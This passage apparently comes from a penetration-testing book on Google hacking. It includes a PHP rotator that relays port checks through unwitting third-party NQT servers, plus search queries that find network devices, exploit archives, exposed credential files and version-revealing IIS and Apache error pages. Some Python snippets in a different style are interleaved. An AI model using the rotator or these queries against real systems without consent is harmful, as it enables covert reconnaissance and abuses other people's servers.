We could dump this output into a file by appending >> nqtfile.txt to the end of the previous sort command. Now that we have a working list of NQT servers, we'll need a copy of the NQT code that produces the interface displayed in Figure 5.10. This interface, with its buttons and "enter host or IP" field, will serve as the interface for our "rotator" program. Getting a copy of this interface is as easy as viewing the source of an existing nqt.php Web page (say, from the list of sites in the nqtfile.txt file) and saving the HTML content to a file we'll call rotator.php on our own Web server. At this point, we have two files in the same directory of our Web server: an nqtfile.txt file containing a list of NQT servers, and a rotator.php file that contains the HTML source of NQT. We'll be replacing a single line in the rotator.php file to create our "rotator" program. This line is the opening tag of the NQT input form. It indicates that once the "Do it" button is pressed, data will be sent to a script called nqt.php. If we were to modify the action of this form tag to point at the nqt.php script on foo.com, our rotator program would send the NQT command to the NQT program located at foo.com, which would execute it on our behalf.
We're going to take this one step further, inserting PHP code that will read a random site from the nqtfile.txt file and insert it into the form line for us. This code might look something like this (lines numbered for clarity):

1. <?php
2. $array = file("./nqtfile.txt");
3. $site = substr($array[rand(0, count($array) - 1)], 0, -1);
4. print "<form method=\"post\" action=\"$site\"><br>";
5. print "Using NQT Site: $site for this session.<br>";
6. print "Reload this page for a new NQT site.<br><br>";
7. ?>

This PHP code segment is meant to replace the opening form line in the original NQT HTML code. Line 1 indicates that a PHP code segment is about to begin. Since the rest of the rotator.php file is HTML, this line, as well as line 7 that terminates the PHP code segment, is required. Line 2 reads our nqtfile.txt file, assigning each line in the file (a URL to an NQT site) to an array element. Line 3, included as a separate line for readability, assigns one random line from the nqtfile.txt file to the variable $site, trimming the trailing newline. Line 4 outputs the modified version of the original form line, changing the action target to point to a random remote NQT site. Lines 5 and 6 simply output informative messages about the NQT site that was selected and instructions for loading a new NQT site. The next line in the rotator.php script would be the table line that draws the main NQT table. When rotator.php is saved and viewed in a browser, it should look similar to Figure 5.12.

Figure 5.12 The NQT Rotator in Action
[Screenshot: the rotator page. Two lines of text ("Using NQT Site: ... /network-tools/nqt.php for this session." and "Reload this page for a new NQT site.") appear above the standard NQT form with its Host Information and Host Connectivity options, host field, and "Do It" button.]

Our rotator program looks very similar to the standard NQT program interface, with the addition of the two initial lines of text. However, when the "check port" box is checked, www.microsoft.com is entered into the host field, and the Do It button is clicked, we are whisked away to the results page on a remote NQT server that displays the results: port 80 is, in fact, open and accepting connections, as shown in Figure 5.13.
Figure 5.13 NQT "Rotator" Output
[Screenshot: the Network Query Tool page at http://noc.neksample.org/nqt.php with www.microsoft.com entered as the host and "Check port: 80" selected. The output reads "Checking Port 80... Port 80 is open and accepting connections."]

This example is designed to suggest that Google can be used to supplement the use of many Web-based applications. All that's required is a bit of Google know-how and a healthy dose of creativity.

Underground Googling...
Netcraft and Google
The Netcraft page at www.netcraft.com/whatis is excellent for getting a quick idea of the type of Web server used by an organization. However, an interesting twist suggested by offtopic@mail.ru involves using Google to search for previously Googled Netcraft results. A query like site:netcraft.com intitle:That.Site.Running will show cached results pages. Want to troll for Apache servers? Toss the word Apache on the end of the query. Netscape? Tomcat? You name it; Netcraft's seen just about all of them.

Targeting Web-Enabled Network Devices

Google can also be used to detect the presence of many Web-enabled network devices. Many network devices come preinstalled with a Web interface to allow an administrator to query the status of the device or to change device settings with a Web browser. While this is convenient, and can even be primitively secured through the use of an SSL-enabled connection, if the Web interface of a device is crawled by Google, even the mere existence of that device can add to a silently created network map. For example, a query like intitle:"BorderManager information alert" can reveal the existence of a Novell BorderManager Proxy/Firewall server, as shown in Figure 5.14.

Figure 5.14 Google Reveals Novell BorderManager Proxy/Firewall
[Screenshot: Google cache of a Novell BorderManager Information Alert page reporting "HTTP Error Status: 502 Bad Gateway" with the description "DNS Host name resolution failed" and a note to contact the Systems Administrator for resolution.]

A crafty attacker could use the mere existence of this device to craft his attack against the target network. For example, if this device is acting as a proxy server, the attacker might attempt to use it to gain access to machines inside a trusted network by bouncing connections off this server. Additionally, an attacker might search for any public vulnerabilities for this product in an attempt to exploit this device directly. Although many different devices can be located in this way, it's generally easier to harvest IP and network data using the output from network statistical programs, as we'll see in the next section. To get an idea of the types of devices that can be located with this technique, consider queries like "Version Info" "Boot Version" "Internet Settings", which locates Belkin Cable/DSL routers; intitle:"wbem" compaq login, which locates HP Insight Management Agents; intitle:"lantronix web-manager", which locates Lantronix web-managers; inurl:tech-support inurl:show Cisco or intitle:"switch home page" "cisco systems" "Telnet - to", which locate various Cisco products; or intitle:"axis storpoint CD" intitle:"ip address", which can locate Axis StorPoint servers. Each of these queries reveals pages that report various bits of information about the networks on which they're installed.

Locating Various Network Reports

In addition to targeting network devices directly, various network documents and status reports can be located with Google that give an outsider access to everything from IP addresses on the network to complete, ready-to-use network diagrams. For example, the query "Looking Glass" (inurl:"lg/" | inurl:lookingglass) will locate looking glass servers that show router statistical information, as shown in Figure 5.15.

Figure 5.15 Looking Glass Router Information
[Screenshot: ILAN Looking Glass output, limited to 200 lines, showing a BGP table (local router ID 192.114.99.250) with the columns Network, From, Flaps, Duration, Reuse, and Path. The listed networks include 12.107.4.0/23, 12.107.6.0/24, and 61.92.0.0/16, each learned from 62.40.103.69.]

The ntop program shows network traffic statistics that can be used to determine the network architecture of a target. The query intitle:"Welcome to ntop!" will locate servers that have publicized their ntop programs, which produce the output shown in Figure 5.16.
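Once a report such as a looking glass page has been saved as text, the network prefixes it lists can be pulled out for a network map. The following is a minimal sketch under stated assumptions: the function name extract_networks and the sample report are hypothetical, the sample uses reserved documentation address ranges and private-use AS numbers, and the column layout only loosely imitates a BGP table.

```python
import ipaddress
import re

# Dotted-quad followed by a prefix length, e.g. 192.0.2.0/24.
CIDR_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}/\d{1,2}\b")


def extract_networks(report_text):
    """Return the unique, valid IPv4 networks mentioned in a text report."""
    networks = set()
    for candidate in CIDR_RE.findall(report_text):
        try:
            # strict=False tolerates host bits set in the address part.
            networks.add(ipaddress.ip_network(candidate, strict=False))
        except ValueError:
            continue  # skip strings that only look like a prefix
    return sorted(networks)


# Hypothetical report text; every address here is invented for illustration.
sample_report = """\
Network          From           Flaps  Path
192.0.2.0/24     198.51.100.69  3      64500 64501
203.0.113.0/24   198.51.100.69  1      64500 64502
999.1.1.0/24     198.51.100.69  2      64500 64503
192.0.2.0/24     198.51.100.69  5      64500 64501
"""

found = [str(net) for net in extract_networks(sample_report)]
for net in found:
    print(net)
```

Validating each candidate with the ipaddress module is a deliberate choice: text scraped from cached pages is often damaged, and anything harvested this way should still be verified before it goes into a report.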
Figure 5.16 NTOP Output Reveals Network Statistics
[Screenshot: an ntop "Remote to Local IP Traffic" page listing host names, IP addresses, and data received for remote hosts, including 10.0.0.85, 12.129.11.49, 128.117.149.64, and 128.242.237.107, each showing 0.0% of data received.]

Practically any Web-based network statistics package can be located with Google. Table 5.1 reveals several examples from the Google Hacking Database that show searches for various network documentation.

Table 5.1 Examples of Network Documentation from the GHDB
(Each query is followed by the device or report it locates.)

intitle:"statistics of" "advanced web statistics"
    awstats shows statistics for Web servers.
intitle:"Big Sister" +"OK Attention Trouble"
    Big Sister program reveals network information.
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -CVS -RPM
    cacti reveals internal network info including architecture, hosts, and services.
inurl:fcgi-bin/echo
    fastcgi echo program reveals detailed server information.
"These statistics were produced by getstats"
    Getstats program reveals server statistical information.
inurl:"/cricket/grapher.cgi"
    grapher.cgi reveals network information like configuration, services, and bandwidth.
intitle:"Object not found" netware "apache 1.."
    HP Switch Web Interface.
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
    ifGraph SNMP data collector.
"Looking Glass" (inurl:"lg/" | inurl:lookingglass)
    Looking Glass network stats output.
filetype:reg "Terminal Server Client"
    Microsoft Terminal Services connection settings Registry files reveal credentials and configuration data.
intext:"Tobias Oetiker" "traffic analysis"
    MRTG analysis pages reveal various network statistical information.
intitle:"Welcome to ntop!"
    ntop program shows current network usage.
inurl:"smb.conf" intext:"workgroup" filetype:conf
    Samba config file reveals server and network data.
intitle:"Ganglia" "Cluster Report for"
    Server Cluster Reports.
intitle:"System Statistics" "System and Network Information Center"
    SNIC reveals internal network information including network configuration, ping times, services, and host information.
intitle:"ADSL Configuration page"
    SolWise ADSL Modem Network Stats.
"cacheserverreport for" "This analysis was produced by calamaris"
    Squid Cache Server Reports.
inurl:vbstats.php "page generated"
    vbstats report reveals server statistical information.
filetype:vsd vsd network -samples -examples
    Visio network drawings.

This type of information is a huge asset during a security audit and can save a lot of time, but realize that any information found in this manner should be validated before it is used in any type of finished report.

Summary

Network data can be obtained in a variety of ways, but Google can play an important role during the information-gathering phase of a network assessment.
By starting with generic information and applying a basic methodology, the details of a network begin to come together, from the simple determination of domain names used by the target down to specific details about machines on the network. No piece of data should be overlooked during an assessment, especially when dealing with a well-secured target. Domain names can be acquired by using simple site queries combined with a bit of page scraping, or by more advanced tools like the BiLE toolkit written by SensePost. Google can be used to locate or augment Web-based networking tools like NQT, which enables remote execution of various network-querying applications. Using creative queries, Google may even locate Web-enabled network devices in use by the target or output from network statistical packages. Whatever your goal during a network-based assessment, there's a good chance Google can be used to augment your existing tools and techniques.

Solutions Fast Track

Mapping Methodology
■ Simple yet effective, the basic methodology presented in this chapter describes the process required to advance your insight into a target's Internet presence.

Mapping Techniques
■ Domain names can be determined through the use of the site operator. Page scraping techniques can be used to extract domain names from Google results pages.
■ Link Mapping is a fairly complex process that determines nonobvious relationships between sites. The BiLE toolkit from SensePost makes quick work of this fairly complex technique.
■ Group Tracing can turn simple author searches into detailed information about a network and its users.
■ Non-Google Web Utilities can be located and enhanced with creative use of Google. We examined the NQT tool, converting it into an anonymized rotator that bounces commands off remote servers before communicating with the target.
Targeting Web-Enabled Network Devices
■ Web-enabled network devices can be located with simple Google queries.
■ The information from these devices can be used to help build a network map.

Locating Various Network Reports
■ Network statistic reports can be located with simple Google queries.
■ The information from these reports can be used to help build a network map.

Links to Sites
www.sensepost.com: Home of the BiLE and BiLE-weigh utilities.

Frequently Asked Questions

The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com.

Q: The NQT tool can only scan one port at a time. Could this behavior be modified?
A: Without modifying the code on the remote NQT server, this task would require the coding of a PHP loop that feeds the requests one at a time to the NQT server. Remember, though, that even single ports can play a critical role when it comes time to perform an actual network port scan. For many different types of scans, it's always advantageous to have a list of ports that are known to be open.

Q: Aren't there any Web-based tools besides NQT with a larger port scan range?
A: If you're interested in scanning lots of ports, you might be better off with a standard scanner like nmap. However, to flex those Google muscles, try a query like inurl:portscan.php ("from Port" | "Port Range") suggested by Jimmy Neutron on the Google Hacking Forums. Although there aren't [...]

Q: [...]
A: [...] a few reasons. First, they are often excessive when you consider that the same task could be more securely accomplished via a serial port connection or a dedicated admin network connection. Second, small devices require small servers, so some exotic Web servers are used that are not as well tested as Apache, for example (consider the vulnerabilities on Axis cams at securityfocus). Third, as we've seen in this chapter, the pages can be found with (or submitted to) Google if the admins are not careful. This opens the floodgates for all the fledgling Google hackers out there.

Q: Our network devices (routers) can't be accessed by anyone from outside; does that mean we are safe?
A: Even though a device is not accessible from the WAN, it may be accessible from a compromised host on your LAN. Posting information about it on Usenet or tech forums is also a risk. For an example, try searching for intext:"enable secret 5 $" as suggested by hevnsnt on the Google Hacking Forums. Then try the same on Google Groups. It's a good thing Cisco implemented strong encryption on those passwords, since these searches often reveal sensitive information about these devices.

Chapter 6
Locating Exploits and Finding Targets

Solutions in this Chapter:
■ Locating Exploit Code
■ Locating Vulnerable Targets
■ Links to Sites
Summary
Solutions Fast Track
Frequently Asked Questions

Introduction

Exploit code, collectively called exploits, is a tool of the hacker trade. Exploits are designed to penetrate a target, and most hackers have many different exploits at their disposal. Some exploits, termed zero day or 0day, remain underground for some period of time, eventually becoming public, posted to newsgroups or Web sites for the world to share. With so many Web sites dedicated to the distribution of exploit code, it's fairly simple to harness the power of Google to locate these tools.
It can be a slightly more difficult exercise to locate potential targets, even though many modern Web application security advisories include a Google search designed to locate potential targets.

In this chapter we explore methods of locating exploit code and potentially vulnerable targets. These are not strictly "dark side" exercises, since security professionals often use public exploit code during a vulnerability assessment. However, only black hats use those tools against systems without prior consent.

Locating Exploit Code

Untold hundreds and thousands of Web sites are dedicated to providing exploits to the general public. Black hats generally provide exploits to aid fellow black hats in the hacking community. White hats provide exploits as a way of eliminating false positives from automated tools during an assessment. Simple searches such as remote exploit and vulnerable exploit locate exploit sites by focusing on common lingo used by the security community. Other searches, such as inurl:0day, don't work nearly as well as they used to, but old standbys like inurl:sploits still work fairly well. The problem is that most security folks don't just troll the Internet looking for exploit caches; most frequent a handful of sites for the more mainstream tools, venturing to a search engine only when their bookmarked sites fail them. When it comes time to troll the Web for a specific security tool, Google's a great place to turn first.

Locating Public Exploit Sites

One way to locate exploit code is to focus on the file extension of the source code and then search for specific content within that code. Since source code is the text-based representation of the difficult-to-read machine code, Google is well suited for this task. For example, a large number of exploits are written in C, which generally uses source code ending in a .c extension. Of course, a search for filetype:c c returns nearly 500,000 results, meaning that we need to narrow our search. A query for filetype:c exploit returns around 5,000 results, most of which are exactly the types of programs we're looking for. Bearing in mind that these are the most popular sites hosting C source code containing the word exploit, the returned list is a good start for a list of bookmarks. Using page-scraping techniques, we can isolate these sites by running a UNIX command such as:

grep Cached exp | awk -F" -" '{print $1}' | sort -u

against the dumped Google results page (saved here in a file named exp). Using good, old-fashioned cut and paste or a command such as lynx -dump works well for capturing the page this way. The slightly polished results of scraping 20 results from Google in this way are shown in Table 6.1.

Table 6.1 Most Common Hits for the Query filetype:c exploit

Site
packetstorm.linuxsecurity.com
synnergy.net
unsecure.altervista.org
www.blacl [...]

[...] within the source code. A query such as "#include <stdio.h>" exploit would locate C source code that contained the word exploit, regardless of the file's extension. This would catch code (and code fragments) that are displayed in HTML documents. Extending the search to include programs that include a friendly usage statement with a query such as "#include <stdio.h>" usage exploit returns the results shown in Figure 6.1.

Figure 6.1 Searching for Exploit Code with Nonstandard Extensions
[Screenshot: Google Web search for "#include <stdio.h>" "Usage" exploit, showing results 1 - 10 of about 14,200. The hits are HTML pages that display C exploit source code, including usage statements.]

This search returns quite a few hits, nearly all of which contain exploit code. Using traversal techniques (or simply hitting up the main page of the site) can reveal other exploits or tools. Notice that most of these hits are HTML documents, which our previous filetype:c query would have excluded. There are lots of ways to locate source code using common code strings, but not all source code can be fit into a nice, neat little box. Some code can be nailed down fairly neatly using this technique; other code might require a bit more query tweaking. Table 6.2 shows some suggestions for locating source code with common strings.

Table 6.2 Locating Source Code with Common Strings

Language        Extension (Optional)   Sample String
asp.net (C#)    Aspx                   "<%@ Page Language="C#"" inherits
asp.net (VB)    Aspx                   "<%@ Page Language="vb"" inherits
asp.net (VB)    Aspx                   <%@ Page LANGUAGE="JScript"
C               C                      "#include <stdio.h>"
C#              Cs                     "using System;" class
C++             Cpp                    "#include "stdafx.h""
Java            J, JAV                 class public static
JavaScript      JS                     " [...]

[...]

79-80. [...] home page, and then look for links to the information you want.
81-86. [...] Click the Back button to try another link. [...]
87. HTTP 400 - Bad Request
88. Internet Information Services
The phrase "Please try the following" in line 65 exists in every single error file in this directory, making it a perfect candidate for part of a good base search. This line could effectively be reduced to "please * * following". Line 88 shows another phrase that appears in every error document: "Internet Information Services". These are "golden terms" to use to search for IIS HTTP/1.1 error pages that Google has crawled. A query such as intitle:"The page cannot be found" "please * * following" "Internet * Services" can be used to search for IIS servers that present a 400 error page, as shown in Figure 8.3.

Chapter 8 • Tracking Down Web Servers, Login Portals, and Network Hardware

Figure 8.3 Smart Search for Locating IIS Servers
[Screenshot: Google cache of an IIS error page titled "The page cannot be found". The page lists suggestions under "Please try the following", shows the line "HTTP Error 404 - File or directory not found. Internet Information Services (IIS)", and ends with technical information for support personnel that mentions IIS Manager (inetmgr).]

Looking at this cached page carefully, you'll notice that the actual error code itself is printed on the page, about halfway down. This error line is also printed on each of IIS's error pages, making for another good limiter for our searching.
The line on the page begins with "HTTP Error 404," which might seem out of place, considering we were searching for a 400 error code, not a 404 error code. This occurs because several IIS error pages share the same title and much of the same text. Although commonalities are often good for Google searching, they could lead to some confusion and produce ineffective results if we are searching for a specific, less benign error page. It's obvious that we'll need to sort out exactly what's what in these error page files. Table 8.1 lists all the unique HTML error page titles and error codes from a default IIS 5 installation.

Table 8.1 IIS HTTP/1.1 Error Page Titles

Error Code                                    Page Title
400                                           The page cannot be found
401.1, 401.2, 401.3, 401.4, 401.5             You are not authorized to view this page
403.1, 403.2                                  The page cannot be displayed
403.3                                         The page cannot be saved
403.4                                         The page must be viewed over a secure channel
403.5                                         The page must be viewed with a high-security Web browser
403.6                                         You are not authorized to view this page
403.7                                         The page requires a client certificate
403.8                                         You are not authorized to view this page
403.9                                         The page cannot be displayed
403.10, 403.11                                You are not authorized to view this page
403.12, 403.13                                The page requires a valid client certificate
403.15                                        The page cannot be displayed
403.16, 403.17                                The page requires a valid client certificate
404.1                                         The Web site cannot be found
[code illegible]                              The page cannot be displayed
406                                           The resource cannot be displayed
407                                           Proxy authentication required
410                                           The page does not exist
412                                           The page cannot be displayed
414                                           The page cannot be displayed
500, 500.11, 500.12, 500.13, 500.14, 500.15   The page cannot be displayed
502                                           The page cannot be displayed

These page titles, used in an intitle search, combined with the other golden IIS error searches, make for very effective searches, locating all sorts of IIS servers that generate all sorts of telling error pages. To troll for IIS servers with the esoteric 404.1 error page, try a query such as intitle:"The Web site cannot be found" "please * * following". A more common error can be found with a query such as intitle:"The page cannot be displayed" "Internet Information Services" "please * * following", which is very effective because this error page is shown for many different error codes.

In addition to displaying the default static HTTP/1.1 error pages, IIS can be configured to display custom error messages, configured via the Management Console. An example of this type of custom error page is shown in Figure 8.4. This type of functionality makes the job of the Google hacker a bit more difficult since there is no apparent way to home in on a customized error page. However, some error messages, including 400, 403.9, 411, 414, 500, 500.11, 500.14, 500.15, 501, 503, and 505 pages, cannot be customized. In terms of Google hacking, this means that there is no easy way an IIS 6 server can prevent displaying the static HTTP/1.1 error pages we so effectively found a minute ago. This opens the door for locating these servers through Google, even if the server has been configured to display custom error pages.

Besides trolling through the IIS error pages looking for exact phrases, we can also perform more generic queries, such as intitle:"the page cannot be found" inetmgr, which focuses on the fairly unique term used to describe the IIS Management console, inetmgr, as shown near the bottom of Figure 8.3. Other ways to perform this same search might be intitle:"the page cannot be found" "internet information services", or intitle:"Under construction" "Internet Information Services".
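The way Table 8.1 feeds into queries can be sketched in a few lines of Python. This is a minimal illustration rather than a tool from the text: the `IIS_TITLES` dictionary holds only a handful of rows from Table 8.1, and the names `iis_query` and `codes_by_title` are hypothetical. It shows that a title shared by many error codes yields a broad search, while a title tied to a single code yields a narrow one.

```python
from collections import defaultdict

# A few rows from Table 8.1 (error code -> page title); not the full table.
IIS_TITLES = {
    "400": "The page cannot be found",
    "403.3": "The page cannot be saved",
    "403.9": "The page cannot be displayed",
    "404.1": "The Web site cannot be found",
    "414": "The page cannot be displayed",
    "500": "The page cannot be displayed",
}

# The two "golden terms" that appear in every default IIS error file.
GOLDEN_TERMS = ['"please * * following"', '"Internet * Services"']


def iis_query(title):
    """Combine an intitle search with the golden terms."""
    return " ".join(['intitle:"%s"' % title] + GOLDEN_TERMS)


def codes_by_title(titles):
    """Group error codes by page title to see which titles are ambiguous."""
    grouped = defaultdict(list)
    for code, title in titles.items():
        grouped[title].append(code)
    return dict(grouped)


if __name__ == "__main__":
    for title, codes in codes_by_title(IIS_TITLES).items():
        scope = "narrow" if len(codes) == 1 else "broad"
        print("%-6s %s  (codes: %s)" % (scope, iis_query(title), ", ".join(codes)))
```

Grouping by title before searching makes it clear up front which queries can single out one error condition and which will sweep in several.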
Other, more specific searches can reveal the exact version of the IIS server, such as a query for intext:"404 Object Not Found" Microsoft-IIS/5.0, as shown in Figure 8.4.

Figure 8.4 "Object Not Found" Error Message Used to Find IIS 5.0

Apache Web Server

Apache Web servers can also be located by focusing on server-generated error messages. Some generic searches such as "Apache/1.3.27 Server at" -intitle:index.of intitle:inf or "Apache/1.3.27 Server at" -intitle:index.of intitle:error (shown in Figure 8.5) can be used to locate servers that might be advertising their server version via an info or error message.

Figure 8.5 A Generic Error Search Locates Apache Servers
A query such as "Apache/2.0.40" intitle:"Object not found!" will locate Apache 2.0.40 Web servers that presented this error message. Figure 8.6 shows an error page from an Apache 2.0.40 server shipped with Red Hat 9.0.

Figure 8.6 A Common Error Message from Apache 2.0.40

Although there might be nothing wrong with throwing queries around looking for commonalities and good base searches, we've already seen in the IIS section that it's more effective to consult the server software itself for search clues. Most Apache installations rely on a configuration file called httpd.conf. Searching through Apache 2.0.40's httpd.conf file reveals the location of the HTML templates for error messages. The referenced files (which follow) are given as paths under the Web root, such as /error/HTTP_BAD_REQUEST.html.var, which refers to the /var/www/error directory on the file system:

    ErrorDocument 400 /error/HTTP_BAD_REQUEST.html.var
    ErrorDocument 401 /error/HTTP_UNAUTHORIZED.html.var
    ErrorDocument 403 /error/HTTP_FORBIDDEN.html.var
    ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var
    ErrorDocument 405 /error/HTTP_METHOD_NOT_ALLOWED.html.var
    ErrorDocument 408 /error/HTTP_REQUEST_TIME_OUT.html.var
    ErrorDocument 410 /error/HTTP_GONE.html.var
    ErrorDocument 411 /error/HTTP_LENGTH_REQUIRED.html.var
    ErrorDocument 412 /error/HTTP_PRECONDITION_FAILED.html.var
    ErrorDocument 413 /error/HTTP_REQUEST_ENTITY_TOO_LARGE.html.var
    ErrorDocument 414 /error/HTTP_REQUEST_URI_TOO_LARGE.html.var
    ErrorDocument 415 /error/HTTP_SERVICE_UNAVAILABLE.html.var
    ErrorDocument 500 /error/HTTP_INTERNAL_SERVER_ERROR.html.var
    ErrorDocument 501 /error/HTTP_NOT_IMPLEMENTED.html.var
    ErrorDocument 502 /error/HTTP_BAD_GATEWAY.html.var
    ErrorDocument 503 /error/HTTP_SERVICE_UNAVAILABLE.html.var
    ErrorDocument 506 /error/HTTP_VARIANT_ALSO_VARIES.html.var

Taking a look at one of these template files, we can see recognizable HTML code and variable listings that show the construction of an error page. The file itself is divided into sections by language. The English portion of the HTTP_NOT_FOUND.html.var file is shown here:

    Content-language: en
    Content-type: text/html
    Body: en--
    The requested URL was not found on this server.
    The link on the referring page seems to be wrong or outdated.
    Please inform the author of that page about the error.
    If you entered the URL manually please check your spelling and try again.
    en--

Notice that the sections of the error page are clearly labeled, making it easy to translate into Google queries. The TITLE variable, shown near the top of the listing, indicates that the text "Object not found!" will be displayed in the browser's title bar. When this file is processed and displayed in a Web browser, it will look like Figure 8.2. However, Google hacking is not always this easy. A search for intitle:"Object not found!" is too generic, returning the results shown in Figure 8.7.

Figure 8.7 Error Message Text Is Not Enough for Profiling

These results are not what we're looking for. To narrow our results, we need a better base search. Constructing our base search from the template files included with the Apache 2.0 source code not only enables us to locate all the potential error messages the server is capable of producing, it also shows us how those messages are translated into other languages, resulting in very solid multilingual base searches.

The HTTP_NOT_FOUND.html.var file listed previously references two virtual include lines, one near the top (include /top.html) and one near the bottom (include /bottom.html). These lines instruct Apache to read and insert the contents of these two files (located in our case in the /var/www/error/include directory) into the current file.
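To make the include mechanism concrete, here is a rough Python sketch of how include directives pull other files into a page. It is a simplification under stated assumptions: the `TEMPLATES` dictionary is a hypothetical stand-in for files on disk, the placeholder strings are not the real file contents, and real server-side includes resolve virtual paths relative to the current document, which this sketch does not model.

```python
import re

# Hypothetical in-memory stand-ins for the template files. Only the include
# structure matters here; the bracketed strings are placeholders.
TEMPLATES = {
    "HTTP_NOT_FOUND": (
        '<!--#include virtual="include/top.html" -->\n'
        "The requested URL was not found on this server.\n"
        '<!--#include virtual="include/bottom.html" -->'
    ),
    "include/top.html": "[contents of top.html]",
    "include/bottom.html": "[contents of bottom.html]",
}

# Matches a server-side include directive and captures the referenced path.
INCLUDE = re.compile(r'<!--#include virtual="([^"]+)"\s*-->')


def expand(name, templates, depth=0):
    """Recursively replace include directives with the named file's text."""
    if depth > 10:  # guard against include loops
        raise RecursionError("include chain too deep: %s" % name)
    text = templates[name]
    return INCLUDE.sub(lambda m: expand(m.group(1), templates, depth + 1), text)


if __name__ == "__main__":
    print(expand("HTTP_NOT_FOUND", TEMPLATES))
```

Because every error template pulls in the same included files, any text those files contribute ends up on every error page, which is what makes strings from them useful in a base search.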
The following code lists the contents of the bottom.html file and shows some subtleties that will help construct that perfect base search:

    </dd></dl><dl>

    Error


    <!--#echo encoding="none" var="DATE_LOCAL" -->
    <!--#echo encoding="none" var="SERVER_SOFTWARE" -->
First, notice line 4, which will display the word "Error" on the page. Although this might seem very generic, it's an important subtlety that would keep results like the ones in Figure 8.7 from displaying. Line 2 shows that another file (/var/www/error/contact.html.var) is read and included into this file. The contents of this file, listed as follows, contain more details we can include into our base search:

    Content-language: en
    Content-type: text/html
    Body: en--
    If you think this is a server error, please contact
    the webmaster
    en--

This file, like the file that started this whole "include chain," is broken up into sections by language. The portion of this file listed here shows yet another unique string we can use. We'll select a fairly unique piece of this line, "think this is a server error," as a portion of our base search instead of just the word error, which we used initially to remove some false positives. The other part of our base search, intitle:"Object not found!", was originally found in the /error/HTTP_NOT_FOUND.html.var file. The final base search for this file then becomes intitle:"Object Not Found!" "think this is a server error", which returns very accurate results, as shown in Figure 8.8.

Figure 8.8 A Good Base Search Evolved
Now that we've found a good base search for one error page, we can automate the query-hunting process to determine good base searches for the other error pages referenced in the httpd.conf file, helping us create solid base searches for each and every default Apache (2.0) error page. The contact.html.var file that we saw previously is included in each and every Apache 2.0 error page via the bottom.html file. This means that "think this is a server error" will work for all the different error pages Apache 2.0 will produce. The other critical element to our search was the intitle search, which we could grep for in each of the error files. While we're at it, we should also try to grab a snippet of the text that is printed in each of the error pages, remembering that in some cases a more specific search might be needed. Using some basic shell commands, we can isolate both the title of an error page and the text that might appear on the error page:

    grep -h -r "Content-language: en" * -A 10 | grep -A5 "TITLE" | grep -v virtual

This Linux bash shell command, when run against the Apache 2.0 source code tree, will produce output similar to that shown in Table 8.2. This table lists the title of each English Apache (2.0 and newer) error page as well as a portion of the text that will be located on the page.
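The same extraction can be sketched in Python for readers who prefer a script to a shell pipeline. Treat this as a minimal sketch under assumptions: the `SAMPLE` text is a reconstruction of how a language section is laid out (including the `set var="TITLE"` directive and the dashed `Body:` markers), not a verbatim copy of the file; the German title is a placeholder; and the function names are hypothetical.

```python
import re
from pathlib import Path

# Assumed layout of a multi-language .html.var template (reconstruction).
SAMPLE = """\
Content-language: de
Content-type: text/html
Body:----------de--
<!--#set var="TITLE" value="(German title)" -->
<!--#include virtual="include/top.html" -->
----------de--

Content-language: en
Content-type: text/html
Body:----------en--
<!--#set var="TITLE" value="Object not found!" -->
<!--#include virtual="include/top.html" -->
The requested URL was not found on this server.
<!--#include virtual="include/bottom.html" -->
----------en--
"""

SECTION = re.compile(r"^Content-language: (\w+)$", re.MULTILINE)
TITLE = re.compile(r'<!--#set var="TITLE" value="([^"]*)"')


def title_for(text, lang="en"):
    """Return the TITLE value from the section for `lang`, or None."""
    parts = SECTION.split(text)
    # With one capture group, split() yields [preamble, lang1, body1, lang2, body2, ...].
    for code, body in zip(parts[1::2], parts[2::2]):
        if code == lang:
            match = TITLE.search(body)
            return match.group(1) if match else None
    return None


def base_query(title, phrase="think this is a server error"):
    """Pair a page title with a phrase shared by every error page."""
    return 'intitle:"%s" "%s"' % (title, phrase)


def titles_in_tree(root, lang="en"):
    """Collect titles from every *.html.var file below `root`."""
    found = {}
    for path in sorted(Path(root).rglob("*.html.var")):
        title = title_for(path.read_text(errors="replace"), lang)
        if title:
            found[path.name] = title
    return found


if __name__ == "__main__":
    print(base_query(title_for(SAMPLE)))
```

The default phrase passed to `base_query` is the English one, so a search in another language would need the matching phrase for that language as well as a different `lang` value.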
Instead of searching for English messages only, we could search for errors in other Apache-supported languages by simply replacing the Content-language string in the previous grep command from en to either de, es, fr, or sv, for German, Spanish, French, or Swedish, respectively.

Table 8.2 The Title and Partial Text of English Apache 2.0 Error Pages

Error Page Title                   Error Page Partial Text
Bad gateway!                       The proxy server received an invalid response from an upstream server.
Bad request!                       Your browser (or proxy) sent a request that this server could not understand.
Access forbidden!                  You don't have permission to access the requested directory. Either there is no index document or the directory is read-protected.
Resource is no longer available!   The requested URL is no longer available on this server and there is no forwarding address.
Server error!                      The server encountered an internal error and was unable to complete your request.
Method not allowed!                A request with the method is not allowed for the requested URL.
No acceptable object found!        An appropriate representation of the requested resource could not be found on this server.
Object not found!                  The requested URL was not found on this server.
Cannot process request!            The server does not support the action requested by the browser.
Precondition failed!               The precondition on the request for the URL failed positive evaluation.
Request entity too large!          The method does not allow the data transmitted, or the data volume exceeds the capacity limit.
Request time-out!                  The server closed the network connection because the browser didn't finish the request within the specified time.
Submitted URI too large!           The length of the requested URL exceeds the capacity limit for this server. The request cannot be processed.
Service unavailable!               The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.
Authentication required!           This server could not verify that you are authorized to access the URL. You either supplied the wrong credentials (such as a bad password) or your browser doesn't understand how to supply the credentials required.
Unsupported media type!            The server does not support the media type transmitted in the request.
Variant also varies!               A variant for the requested entity is itself a negotiable resource. Access not possible.

